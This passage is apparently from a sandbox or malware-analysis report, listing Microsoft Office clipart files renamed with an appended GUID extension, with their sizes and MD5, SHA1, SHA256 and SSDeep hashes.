C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152622.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.38 KB MD5: 15f1274e700ff1022fff68fba3408efb
SHA1: ae9679b781031d315d84a70dbaaea99b2b283ee0
SHA256: e4616919f79afb780d8b209f7a9a1e2c8e6189cff4585e9e068de83785c2dddf
SSDeep: 192:hZLxhllF9mVWzTPd+uiiJXeuXv232WsGowVGxHUmrZAHQiEK7OEYAKRP6JZOPJIM:hZLxhvF97zTPdLpXe6O32NfxHUmrEQiE
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152626.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.63 KB MD5: e661c2dae9d7f40771cdf45e7b8177e9
SHA1: 2d2ee866f0443497f375c7c58b9717def821decb
SHA256: 5bcf176b5309c0c4d54b8e05283be4dbc431b00fc1936e4fb2e53a6d24643db4
SSDeep: 768:EDBgg491ZSGe9cM25J9KHKaoThhN4HrxetsD9n/yfET4aVb5uqM/i3QoXY19TL/O:FiVbEx7q2f3PKrK1c
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152688.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.86 KB MD5: a9eb303e67a91b8f11dd262740483299
SHA1: 52ba3e7755528c70202f5d1b16c016edd673bb77
SHA256: 033fa92cf10def81e0b1f33f9d9d84c016faf5b9082d8519e29c1b0bf1ad2a45
SSDeep: 768:Fa4wVo8kO2g9AgFdcAoFpJ6+COUsA4gTblGDzgDIDEoHm2or3vGrC2MUSeZk2xdb:gegIgWChXchn7D
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.24 KB MD5: 817ea2be70ef55c7d9cf3e2f3578168a
SHA1: a7857682a2754d3bf5351b7c339bbeb0a3153897
SHA256: e6b5d614adb68f1ec33bd95c84f3e898abe27fd8b9715946940761b1c64522f1
SSDeep: 24:t/Kw0kJ5IB4gXoim8/6Xw2CTY2CTycZ2CTgn2CTx2CrbPFcL2CT+27bKA19YKm/:1KRB4gYT8C04WQobfPq9NW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.32 KB MD5: 056264a5d0e339a496b4d6040d395d3b
SHA1: ac287ee34d2332704ad92f1405b3f1ef1b71f80e
SHA256: e37abfe9167821dd34a458d7a43792c775c15c4fdcf236e17e3fd72d4bf0539c
SSDeep: 24:t/jd0M5IB4gXoim8y695fzwqOzs2C9c2CQ22CTGG2CoM+aK2CT/OJM2CjXDn2CaV:1qB4gYT8r5nOc9oQ2xoM+ttjdFW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.15 KB MD5: f0b7fe13a312000a78ff518b167d78d9
SHA1: b5df12f0db562445d6eeb3f805398f295537d1ef
SHA256: 1690bf59e94324c96d21bec18fc01086996545b486bc1b9e64ea763557e8b3fa
SSDeep: 192:YcuJIkJyBWJfiOOaf44lngR48nOirT4A36PPg:Y3JI+DPf4zC8nOirTF3EI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152876.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.69 KB MD5: f57c1fb7363a7784b37b4185a8c43cd3
SHA1: e9778162687ff1fcd16cdcdae661df1a1884fed9
SHA256: f7cc52dcc63172e355fe1c67c3fcf6d7398e798e70daf156c5e2564a797fb6c2
SSDeep: 96:hJ3TnkzdK6kgdK195nAFAMc6w7DXCDPG4Nq8T5Wmz7z73B7jIsDDti3WunWaKXnJ:Lj6drEr+FA4wybHqMRUsVi3WunWdnqLC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152884.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.79 KB MD5: 17790cd0e64fb4c754dc519572f6dc7c
SHA1: 3a344c12b41030ef2f48517e7778b67a16481f55
SHA256: 3093bf19a8671ecc7ac488579dc02f6838f83e91c37cbe137f4b0570e7c7de2a
SSDeep: 192:u2TK1lwNKdVe5swIZgXf84JX3PZdabdis:u2TK1lwNKdV1IjHfa5is
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.90 KB MD5: ee744e8e45d8a4860277fc544ab50361
SHA1: 42128479bc8d6f50c90497cd8c886a669ee04141
SHA256: 028df050957f5edd3b927b3702cf82b17a1fa9d3444dbc929356b9755e27e67c
SSDeep: 48:1cB4gYT8AgEuj7EPPkqxDikGzW3n+d0tMeVMaTW:MJ7Euj7Y15GzEn+KtMWMJ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152894.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.08 KB MD5: 6e3e4869def594ad6627b4586a87ebf1
SHA1: 957cef3116877a5f0cfe88104098201402a04060
SHA256: 37486a2ac2b8dcbb0dccbee5ece7f3ff988e38de7041cd928aac33659c4f163e
SSDeep: 192:i9wZRNWe5HG4U8L4NwwFaOt7OTrhjNuu44A39UNe0Rq7VjSE4tue3BK3a4zdT35o:i9q7xBG0Lsl37krV4j9U9Rq7VjSE4tuW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152898.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.39 KB MD5: f989fd72b97420f3c515455a7f0a130d
SHA1: 745e2bf7ad4c654e709d6d9566adcb5297730ceb
SHA256: f05c7628fe72306e2d26d2faac386beb683cfef0324e7c914c2d28af4d5d6820
SSDeep: 96:vJU4WEB0mWMYkUW2KzP71ONLyarMDt3HDVAX6sSFi:hU4hGmbbzVUyarMDt3HDVa6sSFi
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153047.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 32.29 KB MD5: a9158aedd4938102c3473af82d09a93d
SHA1: db9d27a26dcbba78de38991e6325033cf08ee7c6
SHA256: 3c1a02c5fd38eb9ec835554a85dcca17209f3ffbdba43cfff5941142c4d72385
SSDeep: 768:Ry1OrN84n4+RXRH4Eu09JQ5l+DS0RkhUGEis9psD60HQf/4ak2CL5nf2HWXWdl:oGHdJnQqiXa45f2HeQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153087.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.87 KB MD5: 00c4ab9825b0f77ce3aa38ccbe238d6f
SHA1: 94f37d2922046f618832c8b3673deb328bb5f748
SHA256: 9e79f182ec15c5a9546cd26ee13b5769c992d3c4ec1dd46b893e6e223cecee8e
SSDeep: 48:1UB4gYT80R1DRJNjlCWUeDH89yvPLq8QqF9+033iwPIYXRb6SCfMuqW:sJ0R5NhCTsvPLqbq6AyyIs91Cfz
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153265.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.94 KB MD5: fd667424e7fc140ff549d9f40f0d30ef
SHA1: a8e09d9aeb8542e5acbc80dcac64bd2e3f79e603
SHA256: 8268eb7305260762f121e5c46a221ce708d4c355b848b7178291dd9f563e3036
SSDeep: 48:1XHB4gYT8cWp/kR08LhTUrs3XI/bf1JTALBbVUHyb6IRe5prY3U1b4PlgLTRSd3Y:BHJpN8LhTUaXEPTKBbVv6IRUpr5K+RSI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153398.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.10 KB MD5: 43602e9dde40ff4275a4b7ed755eafcf
SHA1: ba5900f6e0be2438dfb93ddea613d9682579e469
SHA256: 7d343bd475083af050cf51dd0eec8f19d2aa5a01ed767f3b79fe74cde78dee45
SSDeep: 384:m/XvfsMsucKAoKbi0ycD1MvIhgmv97ccFfMId5zhjgZFPLFE+tp2LHRHiIOHoR87:m/nvNcKAfbi0ycD1Mvegm97ccFfpXzhC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153516.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.26 KB MD5: f48e98320bd746386161729ddbc60a0f
SHA1: 847c387cdf53adec90b3a325dea54edb71740348
SHA256: f9e80dea5de30de55dac8791c6b188c8c3fe450ec282d3a74db174a5939b9d6b
SSDeep: 192:+7El/PYmXXYc9TOq/VyNJBJ22Sf375ZJBGplBZIQSNu0GLmbQRA1ySQkO+a/I1wC:+7El/PYmXoc9Tn/VyNJXZSf3PJB0lBZW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157831.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.13 KB MD5: 94d39bb77fba40733e3874b4194f23ff
SHA1: 29acaead5cd4c26192800c0c31737781db952fe4
SHA256: febe2ba9f3363eb8bd01854379462a81f7558010cbb9202522dd9a1055bfa531
SSDeep: 192:1sAi+bmLVaUaHjH7xOxpQvMndz+5o6/3jD83JJriysW1PD+JxPsP3gLBUwRhVle2:K3+bmLMUaDlOxpQvMda5o6/3jD83JJrg
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158477.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.55 KB MD5: eb501c8103c3f13c35567415f6ccfe77
SHA1: 36f319dc9a9f780cc5bf3c5ad39e8d0454c6cc98
SHA256: 2c6a4232d69b5294127fbf6c787774854edf868511035fbb9a3b179ddba2832d
SSDeep: 384:YaMdJG28PIXOgGlILMtykkuXi10EYsU0JkBhj775aIYBkpVp+UkUER9Z108AV5TI:YaMdJG28PxgGlILMtykkuXiaEYsU0JYu
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.72 KB MD5: 18b901bc52b869a1a893f3b66811b682
SHA1: 30408bd8b4b2fed35a98d33614a12da523b688e9
SHA256: 094a379dc8ded0bd7ad02f9de3dfa82f91143cdddc6eefda03362e1814ab560e
SSDeep: 768:r8SSd41k/RHGIE6MBNBHuHDLUDOiwlqNlO8yLYc5zO0D1jEbV9X74w1pnM6QDI4p:y1xURUL
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.42 KB MD5: 2b4e49d1c29ee90733a1f61577a49e64
SHA1: 9e6218b7d3825be0c2c0afef45da0fac36b179c7
SHA256: b35b2755ce6c2325ff0354f497575f10ecfa2bb04d5a4a4babf460e7b140ea5b
SSDeep: 384:whjh66QoPvUyeRhO7tj5bxQetvhTaN8g0BDpI5sV5J+ceyOSB/RS3bsEVD/CrkYQ:whjh66QoPvUyeRhctj5bxQetvhTaWg0i
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172035.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.27 KB MD5: 37bfce07f7705160cec66315d20569f7
SHA1: 1d37f4ee82934d131b0c75baf1f0b72ef09b2b99
SHA256: 4bc54e54dbb0e239a4850e1b14381733e3e8bf0064542f16dbdc474b8e3e740c
SSDeep: 192:BtiGbjlV8NCOhWEHWdyO0Dq77j2/90QEjV:DHXl4h92cOwq770bEjV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172067.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.86 KB MD5: db63f20f041a9bd4a18f0cc8e5c5bb36
SHA1: bbf5c485898ba7b0f1219614c609ba8e0285ec35
SHA256: fe8be1c1da9a3933645f30c464c28386d4986c08c9dc767c95e9ff7c3ed0f746
SSDeep: 192:Du5sFUqqY/7PWnb5GGVV0708Ze4QU9/Nh5reCbSk9OU8Ma3mNp/9CQvuPC6:Du+yqzTOnb5Gpo8Ze4n/NhZeCbTOvWEx
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174639.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.98 KB MD5: 3acc1fe36b45e8dafeee7d631ad13ab9
SHA1: d53e536a8d2f1507ed6ea3728f0b58ab5ed7bdfe
SHA256: 1219af482030ef52b4307efd7e5578ea064510e9fc4b3e612ee774c83d1e8d4d
SSDeep: 96:vJOjXduCx+WrTv4mV5r4yd/jqYzJyDW9cn/DMbjjA/TyCyQWp4R/y+gwR0lrpeYZ:h+XduVkTv35r4ydmOJyDW9cn/DMbjjAA
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.21 KB MD5: 6360ed03283909ef673fdef46ddbf03e
SHA1: d31a883dfa9fdbaf486efcc5b053ab56bdfdbbe4
SHA256: 5144c06d66b9cc38b3d3d2017c072451a63e6d85e5926b5daec3cbd19b5c91a5
SSDeep: 384:z5M2vbu3OylLn2HCda3hA2L/zQ4D7rWLVAS6GHxeLHOs:z5VvbBaD2L7L/zQ4nMCNINs
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 54.25 KB MD5: 4d394bf384d936ecaa1814a88269996c
SHA1: 761c73b9df3a8e07f03fc61724136202bd0bb8e7
SHA256: 555673e486f6d6d8bd56d58d3a40af28e3389f8f130c886f610f63654321f901
SSDeep: 768:B8d+l8NONNpX/6uYpJ9VnCxTHNHILUw7cHJCTgXz5rH+g7YsqW28KQHTuTdQfddl:WRi/09R14bzpHV7caxTuQGVn8
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.52 KB MD5: 14d3c074a690cad15ba89bdb22749fde
SHA1: 2a8c7a9749dfbb6e722a2d328ff9c45b2f5cda6d
SHA256: 2b8270625c072568c8765840626ab7f47c06ad116b5447f2813e1836be990668
SSDeep: 768:aUDJNw5VXMTLRSVUCCDsYvF+hKtH45VI7:xMe1RCCDR945y7
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.80 KB MD5: 32e73ff97c9c286d810da93a5d3ca931
SHA1: 8cc7ae0acdcfa7bb4da5a7440394f1922e80c732
SHA256: 7b52533a426fd39c4e7ab45fe26e865216441b07eed3598a6aef156cfeb18a05
SSDeep: 384:Rs1SL4QyaKCVtx9oLZjvqMW715evZ56b01oyGs2fO/Hon3SJtombhGCLpz19+eeM:RcSL4QyaKwtPoLZjiMWxwvZ56bqoBNfy
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.64 KB MD5: e8b1784c44456405342ad84cb04924d0
SHA1: 1b91ccee552b58bcc0bc39c1facc03fb0518ee12
SHA256: b4f2238e40e0407717cd9db9fad8438cc1bbc4adea1deae339b592a06282f041
SSDeep: 192:GcbnRovDdabB/eHZexFMtHX0uI6eZvi9QKczDDTjTGxTjTwToCTQTfTZTsTlTmbQ:GOovD8bB/eHZyFuHX0uI6eZvi9QTzDDR
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182946.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.71 KB MD5: af2fc324156c93aa3b3abbb8368fb727
SHA1: ff9bdd2835cd6216da168e740f87b52068770cfd
SHA256: f38423c039e2f7eadcdce2e81ae0d219fa936c2f4fb7922edfd6ca738e003087
SSDeep: 384:MbwxfkoU+hGTXJW2WQ4sfGlSR8gNGCI8zGaMqTEgzGjXm8iCw/Yt+3U1Mn/0SbB2:MbwJFU+oTXAxQ4sfGlSR8sHI8zeqTEge
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183174.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 27.96 KB MD5: 7b95cf91f9767f71e076e2b8b1e65d99
SHA1: ccc52782734cb28424f71a08fa98082a7b8d230a
SHA256: 58c9f00a52d597c873b2b8c53f681b93a8f318f059cd833065206c54928a41e1
SSDeep: 768:bCbvthunP/4M8ABdPoUzv+14T7kBZTFhRUqugOjKZOiOLt8H7xvB6YfZ+nLV20n4:O8/7z2qeUE6NmlkmxbijfnK
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183198.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.86 KB MD5: d4824458e38b0eaea6b49d3dbd03e70a
SHA1: 3385d0deea6f5c9b5edc38ed6077664cb0b62395
SHA256: 2a2b45255e5979a8f0c330dd0ec39fb8888b5a9da3f7f7eecc8e0efd5b5e2cd2
SSDeep: 384:WRhARSwz1fex8SM2f2TYO3FXnHQba9o4LT41A/mh1gR4fg0lx7726yHIEc9Ky4Dy:Wru91fexRvoYO3pHQ+9o4n41A/mi4fge
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185778.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 24.72 KB MD5: 7b9f622f9163d6bf28c888a99fa6bfba
SHA1: 880574436e2bc83261181750ff42b6dd69c20b36
SHA256: 856e3127fbe04694f93053efaf49240cf076f47e833b12e418bf0b659fae99ae
SSDeep: 768:q3WXup/KEGTLCB7EEAfYGI2LOrSkXFlxxOqGOd5W+wCadpkXf8voH3sS9VTUFugo:6LvhmZriKiP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185786.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 38.41 KB MD5: 22618007c746c65fe6a21c6861214f5b
SHA1: f63b8564811b5fb00813d9a1efa092fabcbf5369
SHA256: 8dc6cf7b00c34df0cd327e413b71049b0d7befad9181d40ea8ae281e08587344
SSDeep: 768:r4vJ+gTTPXLVxAVmBcXhfKk3Uks8AjCp+WmotWT3OnNlF8YnEXZY5ZhPfaI6SIj+:8kgWjeAV9uVn/8QNcfZmRj6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185798.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.03 KB MD5: 8ed430aa1c51437e6be58a91ddc28871
SHA1: 52bcf15dc499479d45e187ea9f452ab059ce14f4
SHA256: 0b094bc35521f09b21849e1af967fc1e818025c0c1d45412c10071b445aaed31
SSDeep: 768:2p8zpnAMyiaA1B852XZJOzxXwXhLyRwIWPlm0JSY7PUORqWSy+/8xUjzC/lFdvZT:UzD01tVeNuPC6QZnG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185800.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.67 KB MD5: 239ebb420459d7a14616675926d0e376
SHA1: 525ae6ef8bf356751b086792643fea1caeac62ff
SHA256: 4d8aaf08f586376a167ba9e2cea1d01c9f75f7cf595979c55bf40343afe0ddb0
SSDeep: 384:pNowIR1csLKrKRoqUhDg+y+PL6qKCboLzWjW7oWYRkp4M9nPtVNTbpEcgaGfMUZE:pNotR1bKrKRozhDfvPL6qK+oLzWjW7o4
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185806.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 29.81 KB MD5: 60825a0e1c9224c20618198d8f1b30ee
SHA1: d820e57544db5da1394ef038da3799d77784af7d
SHA256: 6a22e435e572f03fff59fee1f15dfc706103516786e540d48a78ce35f8508aea
SSDeep: 768:/eU/GopDZnglNtRCoUxdk7lBjiEi3b5h1hx7WuDZDYZ+ZK/ZfXNGylJT7oC+2xeI:x9BtRvyiYzGd9VHVbW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185818.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 34.89 KB MD5: 5e1447635ecc604e0ed5e89ccea8a714
SHA1: ffbec90f33dd7e5fe3a4cd2d0a99aaa23dfb40fb
SHA256: 68dcbfcdab2e08b47fd32523942c685ab09143aad0c1fad3a21f98600bacd124
SSDeep: 768:yIrlYz2DviyAnYedaEcVNtpHZtY1bvfYWzMmAcjjwW21vvgdET09KxMykGaxu/6S:xxmy2YwVMLflfnGWd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185834.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.38 KB MD5: 68a704ad23db456a2a214b734fe5d52e
SHA1: 3850e09e36f7c360b7cc191b715cae0877062e3d
SHA256: 980b0bf4180e707aba1f7be1a6b22462119b1e22a89344a1f7885758b277caa2
SSDeep: 192:PIlBi4AbwmDFfsdZAHuA7YXmIeFLyZ1vJYWHWYaIS37PLX0lu5ga1Z7j61TXpOLB:PIX9o3DFkdZVA7YXXehyZ1vJYW2Y5mTR
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.97 KB MD5: d912db423f2a57d81e395dda9957cc99
SHA1: 82d950c37a2ff91eb5290ef6477a3129da1db497
SHA256: a4a9bed8a698a426e7f4a142614c85d79ccc6ad68c9c8e3886ad2dc33f81cd37
SSDeep: 384:5vphbDSFl7lmF7TTelwBgxq7wXcTt+O5XzcidA1ngVqYED6nx3gUMGBQ50Nmz7SN:5RhbDSFl7lmF7TTelwBeq7wsTt+O5XzP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186364.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.79 KB MD5: cf90c10d64acad2cb0442031aefa5804
SHA1: 375dfd32f4211b5058216e688840a1d25ac70f7c
SHA256: d76954ea71f692b19a7b623dc6bda68c1e0445525b545216617ffabbb40c1057
SSDeep: 384:mrW8+XaXMJgd23mZ+oSfGD8nANknqZy/iukEGEbemEtsPvOoxl+m4VgmcwZxJSkm:mrW8+XaXMJgd23mZ+oSfGD8nAWnqU/i0
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.37 KB MD5: 79f9063629d5531dfe36422e1b33731a
SHA1: 9d4c25e8fcf6cae4a57a46a1e78fdf80fdbf113c
SHA256: 7889f1e9feb0586c81f135428f50eadf7c2110ffec9561e47aa3410b6caf8f53
SSDeep: 192:GBql9g1WztvsaLIVCTDcb0eGnSNWq2ltFjZtzvrBkMZT0TTbTrTLmVYzDsk/P2iv:Gc9imvs7GE0eGSNWq0tFjZtzNkMZITP1
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.95 KB MD5: 726a9f54c30c983d0082a9f9d2f7a891
SHA1: 2d6a934dc11839c2cf4d0981fbbe8dec0503da90
SHA256: 2db44e24fcdf5038747fef02ead2951cb4a78b6e65106145120d96b3c3fb76b4
SSDeep: 192:Mmh64ZUkpzoRlOT6lBPk7LUfWgkU/pV3diVJdjSYQFAokgn5pzqxbH:Mmh64ZUyz/T6lBsvUfFz/pV3diVJd2YX
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.53 KB MD5: 2ab94b322b91ca6805730451113c4efe
SHA1: 2164e91febe90420e25077133f7f03f890a6688f
SHA256: 1257eb6b5504da7aab61f7d296056ac26ff9f230f6a3cc86816030269bcfaece
SSDeep: 192:gGAeyigtMgOmsYAbq8pMHJ5wLj86jzZUbxsNaA81prTd+TTHTITbTJsYMkIqGVR/:gGGigGgXsYyqaMHjwLjNXibxsNaA81pa
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.90 KB MD5: 16a8286eb1637a736ded7cc2af0e4c06
SHA1: 52e718ef6a3fb630493ac94a06414aa76211f3f6
SHA256: 4c798c68f60b104c0b582cf9096fa6fd86a0e40574ecd9c28920dc94499549b5
SSDeep: 192:P+kQit8T49Gv7ClAouqn0ryzqa6nnLAN77x8FXox3ZDHBV6V0WKX3q5g4j9P:P+lUc48TCioXnHqBnLo7x6oxZbBV6V0o
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.57 KB MD5: 6322456f0581cf39c49cc2756714b048
SHA1: 942ad5b03961a8947ca52daac034645709f42a11
SHA256: ffb3ecdda4bf4aa7235131965c02d27ec589f1702fd81b386f94b5864b3951a1
SSDeep: 192:DsZhs9+Szke2xL62oT7FATRMbxeOrDH7Pnxi2MeKTYHU9HfGTb2T9tYYLHy2uXIw:oZhs9+Szke2xL62oT7FATRMbxeOPH7Pb
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187893.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.49 KB MD5: 153bc62f35b5583b2b99d6c547d3d641
SHA1: 66a7471499132697cc5aa81ee4b502ffe07b6067
SHA256: 3fa9e4d283c9e67359a4ccf24f257ea129909f984d46df07a3637766edc8a337
SSDeep: 96:FJcuYOacui+clXASPUCExuppY3Xrt9rYQIjAIYN1oqEvS5fsjGTRYTY6DTYLTBD/:vczxcui+cl5PxdiXrt98QIUIYbo1vS51
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187895.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.39 KB MD5: 902f1f4515c6b9cbb91371fd85cc5453
SHA1: 5a601f7b07ed5e65316a60b7ca14469c638467a4
SHA256: 912eadf04226af5c7be49697045456bf252a6caf77d2d268b600325bdfb979c2
SSDeep: 96:GAJXPv31vXM0IK1ET+HtxyLDeeDjU1PTdHpaz09S5q/T8H:lXPvdJmT+HtxyLDeeD8dHw09SCTu
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187921.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.88 KB MD5: 8dedf0195bb2086df14e02e2629e7685
SHA1: 5292936f724fd60fda0c279ed26de11f57cabb71
SHA256: ba246b995f349c4141f46bf39aedb7685e79fbb626414655b0a161683bd7a470
SSDeep: 96:wJgBLElg/sLltfmf1ElCQjOLJV/UaJWs7TQT0dhFGTs9TxMalPTkTCoTZwTg4TAz:GyLElwsRtuf19B1V8GF7TQT0bUTs9TxG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188519.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.69 KB MD5: 8baa7915bfc0fc746cf12e6208ff1cf2
SHA1: 5a0aa32ae7102a207fdc4f0031557cca9e1100c5
SHA256: 540aa14edb2cfbcd44e834cea81fc6c76872a7b079a357bd4fbc03a67a2874de
SSDeep: 96:8JJ6iFrN/EGndZONURMCLj+fo9qMipy9poUrC0udt/j8oMLfHlhuTEG9Bb+mPgrp:aFFmNEMC/+gYtpiVC5t/pMLv3MEEBb+T
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.43 KB MD5: 32063229695009fc9586ade50f55a8a1
SHA1: ffe4f09e39a945ba85d960cf6dbba6578d3b1337
SHA256: 78b811e08984bccf8ab56eaa91e25556631e5e64ece3aed44ff1e17e269245f5
SSDeep: 96:RdKDNto30DkivdcRubPGq+qLsSvLWRUCutQofwAbzBymrKqc:RADNto30DkidPD1+qQSvLWWBVnomr8
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195320.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.74 KB MD5: 84d14aeac06ada687c01e570a52822ef
SHA1: 7c872bfad618abc6e60e4eb664bba1a00bbc403d
SHA256: 5f0e392c9dcff542cdf93d79cc06ea06be28d7df9821b3105f152b8f29dca95f
SSDeep: 768:6eCJ2xpUz7gZE5WZaWTEGpui2c/ynpvhOyrKbiaMsPWG+zQghPHAtXJQwrIfu66w:QKcpwvGmsK/UAY1
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195342.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.83 KB MD5: 5cd5a9be2adb1cd5ed5851a4a0111e5b
SHA1: 7daafbf4b83c026dd4cb245ce5bc5ca9e44bb9aa
SHA256: 17d252b404aa15c00d08093e593646e3eb55c1506b543d17cc320cd01c13067f
SSDeep: 384:48FkfINqNyVLTK680PfXz9cwYvZwt7bqTOP7KbfULgFWbXsVJ3fqpFBNU6zpIvln:484IN6yFW8fXz9cwwZI3qTOP7KbfULgd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 18.19 KB MD5: a3e79218c7ec5ecaeb8b915411171576
SHA1: 36c7a05ca1c062dc34b6c288f250c4b40b2bca4b
SHA256: 42500896b5371aa32d29bf0e9a1e68ffd8fe5e8e62eaa24d7588ec41de8d7661
SSDeep: 384:DFFQoqJYGGrCTm24plPwZJHE6o8/mDCoITClAW8a/RIyJ2z7vLikcG1t4vYbzMgo:DFFQoqJYGGrCK2clPwZJHE6o8/mDCpTQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195788.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.93 KB MD5: d67b9bb620dc601cd34314c732617aeb
SHA1: c1a1e37c55739064b5ab7ea2fd92d1039ce0c6f6
SHA256: 5c623f856ccf13f7d3e902ca0ff4984542e1a229d9782c0bce34cab630093e3f
SSDeep: 48:1+kOqB4gYTqe3BARxYTX/WZjQdp154JasaMa1wOrxyTy/yBOHO5kAY4DZwtW:skOs/6BAGvWZjK15YasBa1wyxyTy/yB3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.74 KB MD5: f3d9efa07ad906339c420c1b8993f2ec
SHA1: d7c99eb1f8d25bc0ab8f8dcd0b8066a035f35001
